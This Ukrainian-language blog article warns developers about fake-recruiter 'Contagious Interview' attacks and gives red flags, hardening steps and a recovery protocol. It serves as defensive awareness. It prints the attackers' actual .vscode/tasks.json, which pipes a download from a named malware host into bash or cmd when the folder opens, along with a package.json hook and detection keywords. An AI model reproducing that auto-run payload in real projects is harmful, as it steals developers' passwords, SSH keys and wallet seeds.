Заразна співбесіда: Як фальшиві рекрутери зламують розробників
Резюме: Нова хвиля атак, що підтримується державою, вражає провідних крипто-розробників. Шахраї видають себе за рекрутерів або технічних директорів (CTO) і змушують кандидатів відкривати шкідливий код. Ця стаття розглядає справу "Мартіна Еразо", експлойт "tasks.json" у VS Code та "Протокол спалювання", необхідний для виживання.
Відмова від відповідальності: Ця стаття цитує інциденти кібербезпеки, що включають підроблені особи реальних людей. Імена «Мартін Еразо» та «Ара Вартанян» стосуються персон, використаних зловмисниками. Ми вважаємо, що реальні люди, які стоять за цими іменами, є невинними жертвами крадіжки особистих даних.
1. Ідеальна жертва: Персона "Мартін Еразо"
Це починається з повідомлення, яке натискає всі правильні кнопки для Senior Dev:
- Роль: CTO / Lead Architect
- Бюджет: $6M гарантованого фінансування
- Технології: Web3, AI, Децентралізована інфраструктура
У нещодавно підтвердженій атаці рекрутер на ім'я «Мартін Еразо» зв'язується через LinkedIn. Профіль використовує ім'я та фото реального театрального режисера, але історія роботи фальшива і раптово переходить до «Управління ІТ-проектами» у 2025 році — класична ознака зламаного або купленого облікового запису.
Шахрайство розвивається швидко. Вони пропускають типовий HR-скринінг і переходять безпосередньо до «Технічної співбесіди» зі старшим керівником — у цьому випадку імітуючи реального галузевого CTO Ара Вартаняна (наразі в Limit Break).
Червоний прапорець: Назви проектів постійно змінюються. Рекрутер продає «Betfin» (платформа GameFi), але надіслана презентація стосується «SpaceXView» (проект Metaverse). Ця невідповідність є підказкою, що шахраї переробляють активи між кампаніями.
2. Пастка: "Чи можете ви переглянути наш код MVP?"
Фальшивий «CTO» стверджує, що їм потрібне ваше експертне око, щоб перевірити кодову базу MVP (Minimum Viable Product). Вони надсилають посилання на репозиторій GitHub або ZIP-файл і тиснуть на вас, щоб ви відкрили його під час співбесіди або відразу після неї.
Саме тут відбувається злом.
Вони використовують ваше бажання допомогти та ваше его як зброю. Ви думаєте, що шукаєте помилку в компоненті React. Насправді «помилка» — це «фіча», призначена для крадіжки ваших життєвих заощаджень.
3. Технічне вторгнення: Zero-Click Malware
Зловмисники використовують експлойти типу «zero-click» або «low-check», націлені на інструменти розробників. Вам не потрібно запускати додаток; достатньо просто відкрити папку.
Зброя: .vscode/tasks.json
У цьому конкретному випадку репозиторій містив заражений файл .vscode/tasks.json. Цей файл повідомляє VS Code, як збирати проект.
Шкідливий код:
{
"tasks": [
{
"label": "env",
"type": "shell",
"osx": {
"command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
},
"windows": {
"command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
},
"runOptions": {
"runOn": "folderOpen"
}
}
]
}
- "runOn": "folderOpen": Це тригер. Як тільки ви відкриваєте папку у VS Code, це завдання запускається автоматично.
- Payload: Використовує curl для завантаження скрипта з
vscodesettingtask.vercel.app— відомого хоста шкідливого ПЗ, що маскується під API налаштувань. - Результат: Скрипт запускається в пам'яті та миттєво викрадає паролі Chrome, сесійні куки та ключі SSH.
План Б: Скрипти package.json
Якщо злом VS Code не вдався, у них є скрипти npm:
"scripts": {
"start": "node server/server.js | react-scripts start",
"prepare": "node server/server.js"
}
Запуск npm install або npm start запускає server/server.js — локальний C2 (Command and Control) скрипт, який витокує змінні середовища (ключі AWS, сіди гаманців) зловмиснику.
4. Червоні прапорці проти Зелених прапорців
Як помітити це до того, як стане занадто пізно?
Якщо ви розробник, «Приватні репозиторії» (Private Repos) або ZIP-файли повинні викликати тривогу високого рівня. Легальні компанії використовують Громадські репозиторії або стандартизовані платформи тестування.
Попередження: Це не єдиний вектор атаки на розробників. Прочитайте про Пастку співавтора у Discord і як Атаки на ланцюг поставок роблять залежності небезпечними.
| 🚩 Червоний прапорець (Біжіть) | ✅ Зелений прапорець (Безпечно) |
|---|---|
| Код спочатку: Надсилають код до пропозиції роботи | Стандартний процес: Спочатку співбесіда, потім код |
| Зламана особистість: Рекрутер має непов'язане минуле (наприклад, Художник -> ІТ-менеджер) | Перевірена історія: Кар'єра в LinkedIn послідовна |
| Невідповідність: Назви проектів не збігаються (Betfin vs SpaceXView) | Послідовність: Ім'я, документація та сайт узгоджені |
| Терміновість: «CTO чекає», «відкрийте зараз» | Терпіння: Поважають ваш час і розклад |
| Особиста пошта: [email protected] | Корпоративна пошта: [email protected] (з робочими MX записами) |
5. Протокол безпеки: Як безпечно проходити співбесіду
Якщо ви Senior Dev, на вас будуть полювати. Загартування вашого середовища є обов'язковим.
Протокол 1: Середовище "Burner"
Ніколи не використовуйте свою основну робочу станцію для тестів коду.
- Віртуальні машини: Використовуйте VirtualBox або VMWare.
- Хмарні середовища розробки: Використовуйте GitHub Codespaces або Gitpod. Вони ефемерні та ізольовані від ваших локальних файлів гаманця.
Протокол 2: Судовий аудит
Перш ніж відкривати чужий код:
- Перевірте .vscode/tasks.json: Шукайте
runOn: folderOpen. - Перевірте package.json: Шукайте підозрілі скрипти preinstall або postinstall.
- Ключові слова: grep для
curl,wget,os.homedir(),.ssh,wallet.
Протокол 3: Загартування VS Code
Вимкніть "Workspace Trust" глобально.
- Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always
- Це змушує VS Code запитувати дозвіл перед запуском завдань рівня папки.
6. Рішення: "Протокол спалювання" (Burn Protocol)
Якщо ви відкрили шкідливий репозиторій (як той, що надіслав персона «Мартін Еразо»), припускайте, що вас скомпрометовано. Простого скидання недостатньо.
- Відключіть: Витягніть мережевий кабель негайно.
- Спаліть гаманці: Ваші Приватні ключі витекли. Створіть нові гаманці на чистому пристрої (телефоні) і перемістіть кошти, що залишилися. Ніколи не використовуйте старий сід повторно.
- Вбийте сесії: Вийдіть з усіх сесій Google, GitHub, AWS. Активно відкликайте токени.
- Перевірте SSH ключ: Перевірте налаштування GitHub/GitLab. Зловмисники часто додають свій SSH ключ, щоб зберегти доступ через бекдор. Видаліть все, що ви не впізнаєте.
- Ядерний удар (Nuke It): Очистіть диск і перевстановіть ОС. Це єдиний спосіб бути на 100% впевненим, що руткіти зникли.
Висновок
Шахрайство «Заразна співбесіда» використовує вашу власну експертизу проти вас. Воно націлене на ваше бажання вирішувати проблеми. Але в Web3 параноя — це професійна чеснота. Перевіряйте кожну особу, ізолюйте кожен репозиторій і ніколи не довіряйте «рекрутеру», який поспішає змусити вас запустити код.
Готові Застосувати Свої Знання на Практиці?
Почніть впевнену торгівлю на основі ШІ вже сьогодні
ПочатиСхожі Статті
Отрута ланцюга поставок (Supply Chain Poison): Коли довірені оновлення стають шкідливими
Ви не завантажували нічого дивного. Ви просто оновили додаток Ledger... А потім гроші зникли. Жах атаки на ланцюг поставок.
Паперовий щит (The Paper Shield): Як правильно створити резервну копію сід-фрази
Скріншот — це катастрофа. Хмара — це чужий комп'ютер. Єдиний безпечний спосіб зберігання приватних ключів — це 'сталь' і 'папір'.
Довга гра (The Long Con): Психологія 'Забою свиней'
Вона не написала на неправильний номер. І вона не закохана в вас. Глибоке занурення в 'Sha Zhu Pan', найжорстокіше крипто-шахрайство, і як розпізнати сценарій.